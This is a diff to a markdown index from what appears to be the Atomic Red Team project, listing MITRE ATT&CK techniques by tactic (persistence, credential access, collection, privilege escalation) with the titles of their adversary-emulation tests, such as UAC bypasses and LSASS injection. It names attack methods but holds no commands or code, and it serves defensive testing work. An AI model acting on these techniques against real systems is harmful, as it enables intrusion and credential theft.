-- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - - Atomic Test #1: Create local account with admin priviliges [windows] -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - - Atomic Test #1: Logon Scripts [windows] -- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - - Atomic Test #1: Netsh Helper DLL Registration [windows] -- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) - - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] - - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] - - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] - - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] - - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] -- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) - - Atomic Test #1: Add Port Monitor persistence in Registry [windows] -- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - - Atomic Test #1: Append malicious start-process cmdlet [windows] -- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - - Atomic Test #1: Process Hollowing using PowerShell [windows] - - Atomic Test #2: RunPE via VBA [windows] -- [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Shellcode execution via VBA [windows] - - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] -- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - - Atomic Test #1: Reg Key Run [windows] - - Atomic Test #2: Reg Key RunOnce [windows] - - Atomic Test #3: PowerShell Registry RunOnce [windows] - - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] -- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - - Atomic Test #1: Scheduled Task Startup Script [windows] - - Atomic Test #2: Scheduled task Local [windows] - - Atomic Test #3: Scheduled task Remote [windows] - - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] - - Atomic Test #5: Task Scheduler via VBA [windows] - - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] -- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) - - Atomic Test #1: Modify SSP configuration in registry [windows] -- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - - Atomic Test #1: Service Registry Permissions Weakness [windows] - - Atomic Test #2: Service ImagePath Change with reg.exe [windows] -- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - - Atomic Test #1: Make and modify binary from C source [macos, linux] - - Atomic Test #2: Set a SetUID flag on file [macos, linux] - - Atomic Test #3: Set a SetGID flag on file [macos, linux] -- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - - Atomic Test #1: Shortcut Modification [windows] - - Atomic Test #2: Create shortcut to cmd in startup folders [windows] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - - Atomic Test #1: Sudo usage [macos, linux] - - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] - - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md) - - Atomic Test #1: Named pipe client impersonation [windows] - - Atomic Test #2: `SeDebugPrivilege` token duplication [windows] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) - - Atomic Test #1: Persistence via WMI Event Subscription [windows] -- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) - - Atomic Test #1: Modify Fax service to run PowerShell [windows] - - Atomic Test #2: Service Installation CMD [windows] - - Atomic Test #3: Service Installation PowerShell [windows] -- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] - - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] - -# persistence -- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md) - - Atomic Test #1: Add command to .bash_profile [macos, linux] - - Atomic Test #2: Add command to .bashrc [macos, linux] -- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] - - Atomic Test #2: Replace binary of sticky keys [windows] -- [T1098 Account Manipulation](../../T1098/T1098.md) - - Atomic Test #1: Admin Account Manipulate [windows] - - Atomic Test #2: Domain Account and Group Manipulate [windows] -- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - - Atomic Test #1: Install AppInit Shim [windows] -- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) - - Atomic Test #1: Application Shim Installation [windows] - - Atomic Test #2: New shim database files created in the default shim database directory [windows] - - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] -- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) - - Atomic Test #1: At - Schedule a job [linux] -- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) - - Atomic Test #1: At.exe Scheduled task [windows] -- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1197 BITS Jobs](../../T1197/T1197.md) - - Atomic Test #1: Bitsadmin Download (cmd) [windows] - - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - - Atomic Test #3: Persist, Download, & Execute [windows] - - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - - Atomic Test #3: Firefox [linux, windows, macos] - - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] -- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - - Atomic Test #1: User scope COR_PROFILER [windows] - - Atomic Test #2: System Scope COR_PROFILER [windows] - - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] -- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - - Atomic Test #1: Change Default File Association [windows] -- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1053.003 Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] -- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] -- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) - - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] -- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] -- [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - - Atomic Test #1: Create a new Windows domain admin user [windows] - - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] - - Atomic Test #3: Create a new Domain Account using PowerShell [windows] -- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.014 Emond](../../T1546.014/T1546.014.md) - - Atomic Test #1: Persistance with Event Monitor - emond [macos] -- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1133 External Remote Services](../../T1133/T1133.md) - - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] -- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) - - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO Global Flags [windows] -- T1525 Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) - - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] -- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] -- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) - - Atomic Test #1: Launch Agent [macos] -- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) - - Atomic Test #1: Launch Daemon [macos] -- [T1053.004 Launchd](../../T1053.004/T1053.004.md) - - Atomic Test #1: Event Monitor Daemon Persistence [macos] -- [T1136.001 Local Account](../../T1136.001/T1136.001.md) - - Atomic Test #1: Create a user account on a Linux system [linux] - - Atomic Test #2: Create a user account on a MacOS system [macos] - - Atomic Test #3: Create a new user in a command prompt [windows] - - Atomic Test #4: Create a new user in PowerShell [windows] - - Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux] - - Atomic Test #6: Create a new Windows admin user [windows] -- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) - - Atomic Test #1: Create local account with admin priviliges [windows] -- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) - - Atomic Test #1: Logon Scripts - Mac [macos] -- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) - - Atomic Test #1: Logon Scripts [windows] -- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) - - Atomic Test #1: Netsh Helper DLL Registration [windows] -- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137 Office Application Startup](../../T1137/T1137.md) - - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] -- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137.002 Office Test](../../T1137.002/T1137.002.md) - - Atomic Test #1: Office Application Startup Test Persistence [windows] -- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) - - Atomic Test #1: Install Outlook Home Page Persistence [windows] -- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) - - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] -- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) - - Atomic Test #1: Plist Modification [macos] -- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) - - Atomic Test #1: Add Port Monitor persistence in Registry [windows] -- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - - Atomic Test #1: Append malicious start-process cmdlet [windows] -- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - - Atomic Test #1: rc.common [macos] -- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - - Atomic Test #1: Re-Opened Applications [macos] - - Atomic Test #2: Re-Opened Applications [macos] -- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - - Atomic Test #1: Reg Key Run [windows] - - Atomic Test #2: Reg Key RunOnce [windows] - - Atomic Test #3: PowerShell Registry RunOnce [windows] - - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] - - Atomic Test #5: Suspicious jse file run from startup Folder [windows] - - Atomic Test #6: Suspicious bat file run from startup Folder [windows] - - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] -- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [macos, linux] -- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - - Atomic Test #1: Scheduled Task Startup Script [windows] - - Atomic Test #2: Scheduled task Local [windows] - - Atomic Test #3: Scheduled task Remote [windows] - - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] - - Atomic Test #5: Task Scheduler via VBA [windows] - - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] -- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] -- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) - - Atomic Test #1: Modify SSP configuration in registry [windows] -- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - - Atomic Test #1: Service Registry Permissions Weakness [windows] - - Atomic Test #2: Service ImagePath Change with reg.exe [windows] -- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - - Atomic Test #1: Shortcut Modification [windows] - - Atomic Test #2: Create shortcut to cmd in startup folders [windows] -- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) - - Atomic Test #1: Add file to Local Library StartupItems [macos] -- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - - Atomic Test #1: Create Systemd Service [linux] -- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - - Atomic Test #1: Create Systemd Service and Timer [linux] -- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md) - - Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows] -- [T1546.005 Trap](../../T1546.005/T1546.005.md) - - Atomic Test #1: Trap [macos, linux] -- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1505.003 Web Shell](../../T1505.003/T1505.003.md) - - Atomic Test #1: Web Shell Written to Disk [windows] -- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) - - Atomic Test #1: Persistence via WMI Event Subscription [windows] -- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) - - Atomic Test #1: Modify Fax service to run PowerShell [windows] - - Atomic Test #2: Service Installation CMD [windows] - - Atomic Test #3: Service Installation PowerShell [windows] -- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] - - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] - # credential-access - [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] @@ -397,6 +10,8 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.007 Container API](../../T1552.007/T1552.007.md) + - Atomic Test #1: ListSecrets [macos, linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -419,6 +34,7 @@ - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #1: AppleScript - Prompt User for Password [macos] - Atomic Test #2: PowerShell - Prompt User for Password [windows] @@ -476,6 +92,7 @@ - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] @@ -487,6 +104,7 @@ - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] - T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] @@ -499,7 +117,9 @@ - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -574,6 +194,203 @@ - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) + - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) + - Atomic Test #1: Install AppInit Shim [windows] +- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) + - Atomic Test #1: Application Shim Installation [windows] + - Atomic Test #2: New shim database files created in the default shim database directory [windows] + - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] +- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md) + - Atomic Test #1: Process Injection via C# [windows] +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) + - Atomic Test #1: At.exe Scheduled task [windows] +- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) + - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] + - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] + - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] + - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] + - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] +- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) + - Atomic Test #1: Change Default File Association [windows] +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) + - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] +- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) + - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] +- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] +- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) + - Atomic Test #1: IFEO Add Debugger [windows] + - Atomic Test #2: IFEO Global Flags [windows] +- [T1547.006 Kernel Modules and 